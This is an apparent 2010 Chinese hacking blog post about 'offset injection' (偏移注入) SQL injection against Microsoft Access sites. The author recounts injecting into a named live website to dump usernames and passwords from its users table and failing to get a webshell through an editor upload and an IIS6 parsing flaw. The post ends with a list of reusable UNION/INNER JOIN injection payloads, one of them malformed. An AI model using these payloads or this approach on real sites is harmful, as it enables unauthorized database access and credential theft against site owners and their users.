关于access sql 偏移注入

2010, August 17, 4:46 PM. 黑友网文
Submitted by admin

来源:http://www.f4le.com/post-37.html

这两天没事,无聊的练习下手工注入。随便找了一个网址输入“'”报错!然后and 发现存在注入!然后判断下数据库类型当然是access的了,然后判断 十四个字段

http://www.f4le.com/show_new.asp?bh=397%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14%20from%20users

大小: 5.25 K
尺寸: 420 x 120
浏览: 46 次
点击打开新窗口浏览全图

然后按常规的思路开始爆用户名,密码字段,但是都不行,然后尝试爆破,但是还是不行,然后百度找了下关于注入的语句,发现便宜注入。尝试、、但不成功,随在群里求助,在这里感谢丶反方向的钟!

他还是用的偏移注入。他发来他的 我才知到我的注入语句写错了。。或者说我只是死套老路子吧。然后用他的注入语句成功获取用户名 密码。

http://www.f4le.com/show_new.asp?bh=394%20and%201=2%20union%20select%20*%20from%20(users%20as%20a%20inner%20join%20users%20as%20b%20on%20a.id=b.id )

大小: 6.5 K
尺寸: 420 x 105
浏览: 43 次
点击打开新窗口浏览全图

找到后台登陆,但发现功能过于简单 如图

大小: 9.39 K
尺寸: 420 x 169
浏览: 45 次
点击打开新窗口浏览全图

但是ewe 编辑器提示是hxcms 7.5免费版 有原名 和远程上传 随暗喜,iis6.的服务器,解析漏洞,上传图片发现还是被重命名了,然后测试远程上传的oday,但是名字还是只取文件的后缀然后重命名,郁闷死!所以真的不好拿到shell了,然后想下载7.5的源码看看,但网上没找到7.5免费版的源码,所以只能放弃了 。

其实主要学习的是注入语句关于偏移注入 稍微总结了下

大致的语句如下

and 1=2 union select * from (users as a inner join users as b on a.id=b.id )

and 1=2 union select 1,* from (users as a inner join users as b on a.id=b.id )

and 1=2 union select 1,2,* from (users as a inner join users as b on a.id=b.id )

and 1=2 union select 1,2,3,* from (users as a inner join users as b on a.id=b.id )

and 1=2 union select 1,2,3,*-1,* from (users as a inner join users as b on a.id=b.id )

and 1=2 union select 1,a.id,* from (users as a inner join users as b on a.id=b.id )

and 1=2 union select 1,a.id,b.id,* from (users as a inner join users as b on a.id=b.id )

and 1=2 union select *from( from (users as a inner join users as b on a.id=b.id )

and 1=2 union select * from ((select * from admin) as a inner join (select * from admin) as b on a.id=b.id) inner join (select id from admin) as c on c.id=a.id

等等

ps:要灵活运用!!!

Tags: 偏移, 注入

« 上一篇 | 下一篇 »

只显示10条记录相关文章
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):